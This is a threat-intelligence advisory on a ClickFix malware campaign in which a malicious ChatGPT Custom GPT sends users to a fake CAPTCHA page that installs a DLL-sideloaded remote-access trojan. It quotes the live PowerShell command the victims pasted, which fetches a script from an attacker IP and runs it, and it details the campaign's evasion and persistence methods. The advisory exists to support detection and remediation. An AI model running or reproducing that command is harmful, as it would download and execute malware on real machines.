Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix Campaign Delivering RAT via DLL Sideloading of Canon and Stardock Binaries

Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix (TL-2026-2766), also tracked as Plus 5.6 Custom GPT ClickFix campaign, is a high-severity malware campaign, first published 2026-09-29. It has no confirmed attribution, affects Microsoft Windows, maps to 24 MITRE ATT&CK techniques (T1027, T1027.003, T1036.005), and is covered by 9 detection rules and 34 indicators of compromise.

Key facts for TL-2026-2766

Threat ID
TL-2026-2766
Also known as
Plus 5.6 Custom GPT ClickFix campaign
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
2026-09-29
Last reviewed
2026-09-29
Attribution confidence
LOW
Motivation
UNKNOWN
Target sectors
general
Target regions
Global
Detection rules
9
Indicators of compromise
34

Attackers used Google malvertising and a malicious ChatGPT Custom GPT named "Plus 5.6" to push victims to a fake Cloudflare-style CAPTCHA on Google Sites, where a ClickFix prompt made them run PowerShell that installs a malicious MSI. The MSI sideloads a DLL through legitimately signed Canon (COTFileReadApp.exe) or Stardock (DeElevate64.exe) executables to load a previously undocumented RAT with dual persistence and DNS-over-HTTPS C2 resolution.

How Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix works

Huntress researchers documented a ClickFix campaign in which a trusted chatgpt.com-hosted Custom GPT is the first stage. Victims arrive via Google paid ads (with tracking parameters) at a Custom GPT titled "Plus 5.6", impersonating a ChatGPT model. The GPT is instructed to tell users the primary domain has "limited availability" and to visit a "backup domain", a Google Sites page (sites.google.com/view/antibot172881) that mimics a Cloudflare CAPTCHA with ChatGPT branding and prompts the user to paste and run a PowerShell command. Huntress SOC traced at least 40 incidents to the Google Sites domain, of which two were confirmed to come through a Custom GPT.

The pasted command is `PowerShell.exe -ExecutionPolicy Bypass "irm 1614733393/12 | Out-File $env:temp\1777.ps1;& $env:temp\1777.ps1"`, where 1614733393 is the decimal form of 96.62.224.81. The downloaded script (e.g. 6469.ps1 in V1, 5689.ps1 in V2) is heavily obfuscated with two layers of integer-based encoding (3,036 negative integers decoded by adding key 1520498; a second layer uses key 6178128) and downloads an MSI (ISOSimple.msi, display name "Advanced Printer Configuration Reader") from the same server, executed silently with msiexec /qn /norestart from a %TEMP%\<32 hex>_ISOSimple.msi path. The MSI installs 177 files under %LOCALAPPDATA%\Programs\ with ARPSYSTEMCOMPONENT=1 to hide it from Programs and Features, and launches the signed Canon CaptureOnTouch host COTFileReadApp.exe, which loads a patched ceiinfolog.dll (signature stripped, header checksum modified) that imports a malicious rdCore.dll (fake Polly version info). Additional helper DLLs WPFLocalizeExtension.dll (fake open-source version info) and WMPCL.dll ship alongside. The loader reads an encrypted shellcode blob hidden in a valid RIFF/WAVE file (Common.Integrator.Preview.wav, XOR-encrypted shellcode at offset 0x24362), applies an AMSI bypass, hosts the CLR, unhooks ntdll, and performs anti-VM checks (VMware, VirtualBox, Hyper-V, QEMU, Xen, Parallels) before decrypting monitor.raw, a custom encrypted file-system archive (1,128 entries) that holds a persistence script and the final ~1.58 MB position-independent RAT.

Persistence is an HKCU Run value plus a scheduled task, both named "Canon Configuration Reader", which a shutdown-monitoring script recreates (Run key checked about every 150 seconds, task about every 875 seconds). The RAT supports remote desktop sessions and screen broadcast, camera/microphone/system-audio capture, enumeration of 17 browsers, content-based file search, host reconnaissance (AV/Defender status via WMI, domain and domain-controller info, network adapters, open ports, installed software, Windows features, hardware fingerprint), C2 address resolution via DNS-over-HTTPS (Cloudflare, Google, Quad9) so no local DNS logging occurs, and execution of EXE, DLL (rundll32/regsvcs), MSI, PowerShell, batch, VBScript, JScript and ZIP payloads. Huntress frequently observed follow-on deployment of GOMCam2024.exe to %LOCALAPPDATA%\AppstorageFile\.

OpenAI removed the first Custom GPT by 2026-09-25 after Huntress reported it, but a replacement Custom GPT with the same title stayed active. A second variant found around 2026-09-27 swaps the host to Stardock's DeElevate64.exe (MSI IconEdit2Turb.msi, "Stardock Smart DeElevation Tool"), a patched DeElevator64.dll importing I++u.dll (fake SharpCompress info) with helper DLLs senddmp.resources.dll and res.dll, a NuGet-package-disguised loader carrier (Build.dat), the archive execute_engine_disconnect.raw, and a persistence name of "Stardock DeElevation Tool". Its stager is a two-stage script with a spoofed Chrome user agent, fresh obfuscation per request, and Mark-of-the-Web stripping before MSI execution. A third MSI (UltraFreeISOCreateWizardSolution.msi) was seen on the delivery server on 2026-09-23 but was not obtained. The malware family is unnamed in the sources and no actor attribution is given.

MITRE ATT&CK techniques used in TL-2026-2766

Defense Evasion

T1027 Obfuscated Files or Information; T1027.003 Steganography; T1036.005 Match Legitimate Resource Name or Location; T1140 Deobfuscate/Decode Files or Information; T1218.007 Msiexec; T1218.011 Rundll32; T1497.001 System Checks; T1564.001 Hidden Files and Directories; T1574.001 DLL; T1620 Reflective Code Loading

Persistence

T1053.005 Scheduled Task; T1547.001 Registry Run Keys / Startup Folder

Execution

T1059.001 PowerShell; T1204.004 Malicious Copy and Paste

Command and Control

T1071.004 DNS; T1219.002 Remote Desktop Software

Discovery

T1082 System Information Discovery; T1217 Browser Information Discovery; T1518.001 Security Software Discovery

Collection

T1123 Audio Capture; T1125 Video Capture

defense-impairment

T1553.005 Mark-of-the-Web Bypass; T1685 Disable or Modify Tools

Resource Development

T1583.008 Malvertising

Affected products and versions in Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix

  • Microsoft — Windows
    Vulnerable versions: Windows endpoints where users can run PowerShell and install per-user MSI packages
  • OpenAI — ChatGPT Custom GPTs (abused as a lure-hosting platform)
  • Canon — CaptureOnTouch (COTFileReadApp.exe, signed binary abused for DLL sideloading)
  • Stardock — SmartDeElevation (DeElevate64.exe, signed binary abused for DLL sideloading)

Remediation for Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix

Immediate actions

  • Block 96.62.224.81 and 45.140.205.28 and alert on HTTP requests to the decimal-IP host 1614733393
  • Hunt for powershell.exe spawning msiexec.exe /i against %TEMP%\<GUID>_*.msi with /qn /norestart
  • Hunt for COTFileReadApp.exe or DeElevate64.exe running from %LOCALAPPDATA%\Programs\ and for an unsigned ceiinfolog.dll or DeElevator64.dll beside them
  • Remove HKCU Run values and scheduled tasks named 'Canon Configuration Reader' or 'Stardock DeElevation Tool' only after isolating the host, because the implant recreates them
  • Isolate affected hosts and treat browser-stored credentials as compromised

Workarounds

  • Block or gate access to sites.google.com/view/* for endpoints where it is not required
  • Application-control policy (WDAC/AppLocker) to block MSI installs and executables from %LOCALAPPDATA%\Programs by non-admin users

Longer-term hardening

  • Train users that no legitimate CAPTCHA or AI-model page asks them to paste commands into the Windows Run dialog or PowerShell
  • Restrict PowerShell (Constrained Language Mode, script block logging) and disable the Win+R Run dialog where feasible
  • Add detections for unsigned or checksum-modified DLLs loaded by signed vendor executables running from user-writable paths
  • Review paid-ad and AI-assistant link exposure in web filtering policy

Timeline of Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix

  • Third MSI lure (UltraFreeISOCreateWizardSolution.msi) observed on the same delivery server (1614733393 / 96.62.224.81); not obtained for analysis.
  • Compilation timestamp (22:46 UTC) of the malicious loader DLLs analysed by Huntress.
  • A second 'Plus 5.6' Custom GPT with the same title remained active after the first was taken down, continuing to funnel victims to the Google Sites ClickFix page.
  • OpenAI removed the first malicious 'Plus 5.6' Custom GPT after Huntress reported it.
  • Replacement 'Plus 5.6' Custom GPT found active, delivering the same RAT via Stardock DeElevate64.exe sideloading (IconEdit2Turb.msi, Build.dat, execute_engine_disconnect.raw).
  • Huntress published its technical write-up of the eight-stage chain, documenting at least 40 incidents traced to the Google Sites domain and two confirmed via a Custom GPT.
  • Media coverage (Cyber Security News, IT Security Guru, Cryptika, Mallory) amplified the Huntress research; the replacement Custom GPT was still reported active at time of publication.

Sources cited for Malicious ChatGPT Custom GPT "Plus 5.6" Used in ClickFix

More in malware

Detection coverage for TL-2026-2766

As of 2026-09-29, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2766 across Splunk SPL, Microsoft KQL and Sigma, covering 34 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat weather, live.

Every square is one real report, mapped to MITRE ATT&CK and shipped with Splunk SPL, Microsoft KQL and Sigma detections you can copy.

Every threat in the corpus, newest first.

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats